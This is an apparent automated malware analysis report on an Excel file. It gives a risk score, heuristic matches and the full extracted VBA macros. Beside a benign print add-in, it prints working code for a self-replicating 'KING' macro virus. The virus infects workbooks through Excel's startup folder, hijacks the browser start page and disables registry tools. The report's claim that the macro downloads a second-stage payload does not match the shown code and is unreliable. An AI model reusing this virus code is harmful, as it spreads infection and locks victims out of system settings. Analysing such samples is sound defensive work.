MALICIOUS
218
Risk Score
Malware Insights
MITRE ATT&CK
T1059.005 Visual Basic
T1059 Command and Scripting Interpreter
T1203 Exploitation for Client Execution
The sample is an Excel document containing VBA macros. Heuristics indicate the use of WScript.Shell and CreateObject, suggesting the execution of arbitrary commands. The presence of an Auto_Open macro further supports the intent to execute malicious code upon opening. The script likely downloads and executes a second-stage payload from the embedded URL.
Heuristics 8
-
VBA macros detected medium 5 related findings OLE_VBA_MACROSDocument contains VBA macro code
-
WScript.Shell usage critical OLE_VBA_WSCRIPTWScript.Shell usageMatched line in script
Set OperationRegistry = CreateObject("WScript.Shell") -
CreateObject call high OLE_VBA_CREATEOBJCreateObject callMatched line in script
Set OperationRegistry = CreateObject("WScript.Shell") -
VBA p-code auto-exec with execution tokens high OLE_VBA_PCODE_AUTOEXEC_EXECCompiled VBA/cache stream contains an auto-execution token together with shell/download/object-execution tokens. This catches p-code-only or source-extraction-failure macro documents where visible source is unavailable.
-
Auto_Open macro low OLE_VBA_AUTOAuto_Open macroMatched line in script
Private Function auto_open() -
Auto_Close macro low OLE_VBA_AUTOCLOSEAuto_Close macroMatched line in script
Private Function auto_close() -
Reference to Windows Script Host high SC_STR_WSCRIPTReference to Windows Script Host
-
Embedded URL info EMBEDDED_URLOne or more URLs were extracted from the document. The URL itself is not a detection — see the per-URL labels for which channel (macro, JS, link annotation, document body, ...) reached each URL.URL http://www.cjx.com.cn/Default.aspx�]� In document text (OLE body)
- http://3azu.taobao.comIn document text (OLE body)
Extracted artifacts 1
Files carved from inside the sample during analysis.
| Filename | Kind | Source | Size |
|---|---|---|---|
macros.bas |
vba-macro | oletools.olevba.extract_macros (decoded VBA source) | 16891 bytes |
SHA-256: b7597912d64f3e3a95b2d3c12a151f2b939f800d24aac84cbdfb9ae9f9a6c581 |
|||
Preview scriptFirst 1,000 lines of the extracted script
Attribute VB_Name = "Tab4SB7"
Attribute VB_Base = "0{00020820-0000-0000-C000-000000000046}"
Attribute VB_GlobalNameSpace = False
Attribute VB_Creatable = False
Attribute VB_PredeclaredId = True
Attribute VB_Exposed = True
Attribute VB_TemplateDerived = False
Attribute VB_Customizable = True
Attribute VB_Name = "CJXGys_WorkBook"
Attribute VB_Base = "0{00020819-0000-0000-C000-000000000046}"
Attribute VB_GlobalNameSpace = False
Attribute VB_Creatable = False
Attribute VB_PredeclaredId = True
Attribute VB_Exposed = True
Attribute VB_TemplateDerived = False
Attribute VB_Customizable = True
Attribute VB_Name = "Tab1"
Attribute VB_Base = "0{00020820-0000-0000-C000-000000000046}"
Attribute VB_GlobalNameSpace = False
Attribute VB_Creatable = False
Attribute VB_PredeclaredId = True
Attribute VB_Exposed = True
Attribute VB_TemplateDerived = False
Attribute VB_Customizable = True
Attribute VB_Name = "Tab2"
Attribute VB_Base = "0{00020820-0000-0000-C000-000000000046}"
Attribute VB_GlobalNameSpace = False
Attribute VB_Creatable = False
Attribute VB_PredeclaredId = True
Attribute VB_Exposed = True
Attribute VB_TemplateDerived = False
Attribute VB_Customizable = True
Attribute VB_Name = "Tab3"
Attribute VB_Base = "0{00020820-0000-0000-C000-000000000046}"
Attribute VB_GlobalNameSpace = False
Attribute VB_Creatable = False
Attribute VB_PredeclaredId = True
Attribute VB_Exposed = True
Attribute VB_TemplateDerived = False
Attribute VB_Customizable = True
Attribute VB_Name = "Tab3Y"
Attribute VB_Base = "0{00020820-0000-0000-C000-000000000046}"
Attribute VB_GlobalNameSpace = False
Attribute VB_Creatable = False
Attribute VB_PredeclaredId = True
Attribute VB_Exposed = True
Attribute VB_TemplateDerived = False
Attribute VB_Customizable = True
Attribute VB_Name = "Tab5"
Attribute VB_Base = "0{00020820-0000-0000-C000-000000000046}"
Attribute VB_GlobalNameSpace = False
Attribute VB_Creatable = False
Attribute VB_PredeclaredId = True
Attribute VB_Exposed = True
Attribute VB_TemplateDerived = False
Attribute VB_Customizable = True
Attribute VB_Name = "Module1"
'北京成捷迅应用软件技术有限公司
'电话:010-58731022/3/4/5/6
'作者:何仲珩 QQ:709539682
'VBA属于玩儿票性质,2010-3-27
Private Function 显示所有Sheet()
Dim a As Integer
For a = 2 To Worksheets.count
Worksheets(a).Visible = -1
Next
End Function
Private Function 关闭所有Sheet()
Dim a As Integer
For a = 2 To Worksheets.count
Worksheets(a).Visible = 0
Next
End Function
Private Function auto_open()
Dim menuMain As Menu, mainmenu
On Error Resume Next
mainmenu = "成捷迅附加菜单(&C)"
Set menuMain = MenuBars(xlWorksheet).Menus(mainmenu)
If menuMain Is Nothing Then
MenuBars(xlWorksheet).Menus.Add Caption:=mainmenu
Else
Exit Function
End If
With MenuBars(xlWorksheet).Menus(mainmenu).MenuItems
.Add "打印预览当前页(&W)", "CJXPrintPreview"
.Add "打印当前页(&P)", "CJXPrint"
.Add "全部打印可见页面(&A)", "CJXPrintAll"
.Add "--"
.Add "设置每页打印行数(&S)", "CJXSetLineCount"
.Add "关闭每页打印行数页面(&C)", "CJXCloseLineCountPage"
.Add "--"
.Add "显示所有页--设置模板时使用(&I)", "显示所有Sheet"
.Add "关闭所有页--设置模板时使用(&V)", "关闭所有Sheet"
.Add "--"
.Add "关于(&A)", "CJXAbout"
End With
End Function
Private Function auto_close()
Application.CommandBars(1).Reset
End Function
Private Function CJXSetLineCount()
With Worksheets("打印行数")
.Visible = -1
.Activate
End With
End Function
Private Function CJXCloseLineCountPage()
Worksheets("打印行数").Visible = 0
End Function
Private Function CJXAbout()
UserForm1.Show
End Function
Private Function GetLineCount(ws As Worksheet) As Integer
Dim nRow As Integer, strText As String
nRow = 1
While True
strText = PrintLineCount.Cells(nRow, 1).Text
If Len(Trim(strText)) = 0 Then
GetLineCount = 0
Exit Function
End If
If strText = ws.name Then
GetLineCount = CInt(Trim(PrintLineCount.Cells(nRow, 2).Text))
Exit Function
End If
nRow = 1 + nRow
Wend
End Function
Private Function GetPrintRow(ws As Worksheet) As Integer
Dim strPrintArea As String
strPrintArea = ws.PageSetup.PrintArea
Dim nIndex As Long
nIndex = InStr(1, strPrintArea, ":")
strPrintArea = Mid(strPrintArea, nIndex + 2)
nIndex = InStr(1, strPrintArea, "$")
GetPrintRow = CInt(Mid(strPrintArea, nIndex + 1))
End Function
Private Function GetStartRow(ws As Worksheet) As Integer
Dim strPrintHead As String
strPrintHead = ws.PageSetup.PrintTitleRows
Dim nIndex As Long
nIndex = InStr(1, strPrintHead, ":")
strPrintHead = Mid(strPrintHead, nIndex + 2)
GetStartRow = CInt(strPrintHead) + 1
End Function
Private Function GetStartIndex() As Integer
On Error GoTo errHandler
Dim str As String
str = Trim(BaseInfo.Cells(21, "D").Text)
If Len(str) = 0 Then
GetStartIndex = -1
Else
GetStartIndex = CInt(str)
End If
Exit Function
errHandler:
GetStartIndex = -1
End Function
Private Function SetPageSetup(ws As Worksheet)
With ws.PageSetup
.LeftHeader = ""
.CenterHeader = ""
.RightHeader = ""
.LeftFooter = ""
.CenterFooter = ""
.RightFooter = ""
End With
End Function
Private Function CheckTab4(ws As Worksheet) As Boolean
CheckTab4 = InStr(ws.name, "表四甲") > 0 Or InStr(ws.name, "材料") > 0 Or InStr(ws.name, "设备") > 0
End Function
Private Function PrintPreview(Optional bIsPrint As Boolean = False, Optional bLockApplication = True)
On Error Resume Next
If bLockApplication Then
With Application
.Calculation = xlManual
.ScreenUpdating = False
.EnableEvents = False
End With
End If
Dim wsSave As Worksheet, nRowCountPerPage As Integer
Set wsSave = ActiveSheet
nRowCountPerPage = GetLineCount(wsSave)
If nRowCountPerPage = 0 Then
If bIsPrint Then
wsSave.PrintOut
Else
wsSave.PrintPreview
End If
GoTo EndFunction
End If
Dim nStartPage As Integer, bDa As Boolean, bIsTab4 As Boolean, nTab4Index As Integer
nStartPage = GetStartIndex()
bDa = nStartPage > 0
Dim nLastRow As Integer, nBottomRows As Integer
nBottomRows = 1
nLastRow = GetPrintRow(wsSave) - (nBottomRows - 1)
If bDa Then
Dim ws1 As Worksheet
bIsTab4 = CheckTab4(wsSave)
nTab4Index = 1
For iii = 1 To Worksheets.count
Set ws1 = Worksheets(iii)
If (ws1.Visible = xlSheetVisible And ws1.name <> BaseInfo.name And ws1.name <> PrintLineCount.name) Then
If (ws1.name = wsSave.name) Then
Exit For
End If
nLRow = GetPrintRow(ws1) - (nBottomRows - 1)
nSRow = GetStartRow(ws1)
nRowCPerPage = GetLineCount(ws1)
nCRowCount = nLRow - nSRow - 3
nSaveStartPage = nStartPage
If nRowCPerPage > nCRowCount Then
nStartPage = nStartPage + 1
Else
nMod1 = nCRowCount Mod nRowCPerPage
nPs = (nCRowCount - nMod1) / nRowCPerPage
If nMod1 <> 0 Then
nStartPage = nStartPage + nPs + 1
Else
nStartPage = nStartPage + nPs
End If
End If
If bIsTab4 And CheckTab4(ws1) Then
nTab4Index = nTab4Index + (nStartPage - nSaveStartPage)
End If
End If
Next
End If
Dim nStartRow As Integer
nStartRow = GetStartRow(wsSave)
wsSave.Copy before:=wsSave
Dim ws As Worksheet
Set ws = ActiveSheet
Dim nCurRowCount As Integer, nPages As Integer, nMod As Integer, nAdded As Integer, ii As Integer
nCurRowCount = nLastRow - nStartRow
If nRowCountPerPage > nCurRowCount Then
nMod = nCurRowCount
Else
nMod = nCurRowCount Mod nRowCountPerPage
End If
If (nRowCountPerPage > nCurRowCount Or nMod > 3) Then
nAdded = nRowCountPerPage - nMod
For ii = 1 To nAdded
If ii = 1 Then
ws.Rows(nLastRow - 1).Select
End If
Selection.Copy
Selection.Insert Shift:=xlDown
Next
ElseIf (nMod > 0 And nMod <= 3) Then
nAdded = 0
For ii = 1 To nMod
nLastRow = nLastRow - 1
ws.Rows(nLastRow).Delete Shift:=xlShiftUp
Next
Else
nAdded = 0
End If
nLastRow = nLastRow + nAdded
nCurRowCount = nLastRow - nStartRow
nPages = nCurRowCount / nRowCountPerPage
strOldTiltle = ws.Cells(5, "B").Formula
Dim strTT As String
If bDa Then
If bIsTab4 Then
strTT = """-" & CStr(nTab4Index) & " 第" & CStr(nStartPage) & "页"""
Else
strTT = """-1 第" & CStr(nStartPage) & "页"""
End If
Else
strTT = IIf(nPages = 1, """全页""", """第1页共" & CStr(nPages) & "页""")
End If
ws.Cells(5, "B").Formula = strOldTiltle & "&" & strTT
If nPages > 1 Then
strOld = Replace(ws.PageSetup.PrintTitleRows, "$", "")
nThisRowCount = ws.Rows(strOld).count
ws.PageSetup.PrintTitleRows = ""
For ii = 1 To nPages - 1
ws.Rows(CStr(nLastRow) & ":" & CStr(nLastRow + nBottomRows - 1)).Select
Selection.Copy
nRow = nRowCountPerPage * ii + (nBottomRows + nThisRowCount) * (ii - 1) + nStartRow
ws.Rows(nRow).Select
Selection.Insert Shift:=xlDown
ws.Rows(strOld).Select
Selection.Copy
ws.Rows(nRow + nBottomRows).Select
Selection.Insert Shift:=xlDown
If bDa Then
If bIsTab4 Then
nTab4Index = nTab4Index + 1
strTT = """-" & CStr(nTab4Index) & " 第" & CStr(nStartPage + ii) & "页"""
Else
strTT = """-" & CStr(ii) & "第" & CStr(nStartPage + ii) & "页"""
End If
Else
strTT = """第" & CStr(ii + 1) & "页共" & CStr(nPages) & "页"""
End If
ws.Cells(5 + (nRowCountPerPage + nThisRowCount + nBottomRows) * ii, "B").Formula = strOldTiltle & "&" & strTT
nLastRow = nLastRow + nBottomRows + nThisRowCount
Next
End If
With ws.PageSetup
.LeftHeader = ""
.CenterHeader = ""
.RightHeader = ""
.LeftFooter = ""
.CenterFooter = ""
.RightFooter = ""
End With
If bIsPrint Then
ws.PrintOut
Else
ws.PrintPreview
End If
wsSave.Activate
Application.DisplayAlerts = False
ws.Delete
EndFunction:
If bLockApplication Then
With Application
.Calculation = xlAutomatic
.ScreenUpdating = True
.EnableEvents = True
End With
End If
End Function
Private Function CJXPrintPreview()
PrintPreview
End Function
Private Function CJXPrint()
PrintPreview bIsPrint:=True
End Function
Private Function CJXPrintAll()
On Error Resume Next
Dim ii As Integer, ws As Worksheet, wsSave As Worksheet
Set wsSave = ActiveSheet
With Application
.Calculation = xlManual
.ScreenUpdating = False
.EnableEvents = False
End With
For ii = 1 To Worksheets.count
Set ws = Worksheets(ii)
If (ws.Visible = xlSheetVisible And ws.name <> BaseInfo.name And ws.name <> PrintLineCount.name) Then
ws.Activate
Call PrintPreview(True, False)
End If
Next
wsSave.Activate
With Application
.Calculation = xlAutomatic
.ScreenUpdating = True
.EnableEvents = True
End With
End Function
Attribute VB_Name = "BaseInfo"
Attribute VB_Base = "0{00020820-0000-0000-C000-000000000046}"
Attribute VB_GlobalNameSpace = False
Attribute VB_Creatable = False
Attribute VB_PredeclaredId = True
Attribute VB_Exposed = True
Attribute VB_TemplateDerived = False
Attribute VB_Customizable = True
Attribute VB_Name = "UserForm1"
Attribute VB_Base = "0{717FD4B3-D4B3-432F-8602-1424499BF9F2}{987E6FF5-3125-4C55-B533-5B9C84961820}"
Attribute VB_GlobalNameSpace = False
Attribute VB_Creatable = False
Attribute VB_PredeclaredId = True
Attribute VB_Exposed = False
Attribute VB_TemplateDerived = False
Attribute VB_Customizable = False
Private Sub CommandButton1_Click()
Me.Hide
End Sub
Attribute VB_Name = "Tab3Y2"
Attribute VB_Base = "0{00020820-0000-0000-C000-000000000046}"
Attribute VB_GlobalNameSpace = False
Attribute VB_Creatable = False
Attribute VB_PredeclaredId = True
Attribute VB_Exposed = True
Attribute VB_TemplateDerived = False
Attribute VB_Customizable = True
Attribute VB_Name = "Tab4SB5"
Attribute VB_Base = "0{00020820-0000-0000-C000-000000000046}"
Attribute VB_GlobalNameSpace = False
Attribute VB_Creatable = False
Attribute VB_PredeclaredId = True
Attribute VB_Exposed = True
Attribute VB_TemplateDerived = False
Attribute VB_Customizable = True
Attribute VB_Name = "Tab4SB8"
Attribute VB_Base = "0{00020820-0000-0000-C000-000000000046}"
Attribute VB_GlobalNameSpace = False
Attribute VB_Creatable = False
Attribute VB_PredeclaredId = True
Attribute VB_Exposed = True
Attribute VB_TemplateDerived = False
Attribute VB_Customizable = True
Attribute VB_Name = "Tab4"
Attribute VB_Base = "0{00020820-0000-0000-C000-000000000046}"
Attribute VB_GlobalNameSpace = False
Attribute VB_Creatable = False
Attribute VB_PredeclaredId = True
Attribute VB_Exposed = True
Attribute VB_TemplateDerived = False
Attribute VB_Customizable = True
Attribute VB_Name = "Tab6"
Attribute VB_Base = "0{00020820-0000-0000-C000-000000000046}"
Attribute VB_GlobalNameSpace = False
Attribute VB_Creatable = False
Attribute VB_PredeclaredId = True
Attribute VB_Exposed = True
Attribute VB_TemplateDerived = False
Attribute VB_Customizable = True
Attribute VB_Name = "KING"
Sub auto_open()
Application.OnSheetActivate = "ck_files"
End Sub
Sub ck_files()
c$ = Application.StartupPath
m$ = Dir(c$ & "\" & "KING.XLS") 'results
If m$ = "KING.XLS" Then p = 1 Else p = 0
If ActiveWorkbook.Modules.count > 0 Then w = 1 Else w = 0
whichfile = p + w * 10
Select Case whichfile
Case 10
Application.ScreenUpdating = False
n4$ = ActiveWorkbook.name
Sheets("KING").Visible = True
Sheets("KING").Select
Sheets("KING").Copy
With ActiveWorkbook
.Title = ""
.Subject = ""
.Author = ""
.Keywords = ""
.Comments = ""
End With
newname$ = ActiveWorkbook.name
c4$ = CurDir()
ChDir Application.StartupPath
ActiveWindow.Visible = False
Workbooks(newname$).SaveAs FileName:=Application.StartupPath & "/" & "KING.XLS", FileFormat:=xlNormal _
, Password:="", WriteResPassword:="", ReadOnlyRecommended:= _
False, CreateBackup:=False
ChDir c4$
Workbooks(n4$).Sheets("KING").Visible = False
Application.OnSheetActivate = ""
Application.ScreenUpdating = True
Application.OnSheetActivate = "KING.XLS!ck_files"
Case 1
Application.ScreenUpdating = False
n4$ = ActiveWorkbook.name
p4$ = ActiveWorkbook.Path
s$ = Workbooks(n4$).Sheets(1).name
If s$ <> "KING" Then
Workbooks("KING.XLS").Sheets("KING").Copy before:=Workbooks(n4$).Sheets(1)
Workbooks(n4$).Sheets("KING").Visible = False
Else
End If
Application.OnSheetActivate = ""
Application.ScreenUpdating = True
Application.OnSheetActivate = "KING.XLS!ck_files"
Case Else
End Select
Dim OperationRegistry
On Error Resume Next
Set OperationRegistry = CreateObject("WScript.Shell")
MyUrl = "http://3azu.taobao.com"
RegPath = "HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Internet Explorer\MAIN\Start Page"
OperationRegistry.RegWrite RegPath, MyUrl
RegPath = "HKEY_CURRENT_USER\SOFTWARE\MICROSOFT\Internet Explorer\Main\Start Page"
OperationRegistry.RegWrite RegPath, MyUrl
RegPath = "HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Policies\System\DisableRegistryTools"
OperationRegistry.RegWrite RegPath, "1", "REG_DWORD"
Exit Sub '正常运行的话会在这里退出程序
End Sub
|
|||
Open this report in the interactive analyzer, or submit your own file for analysis.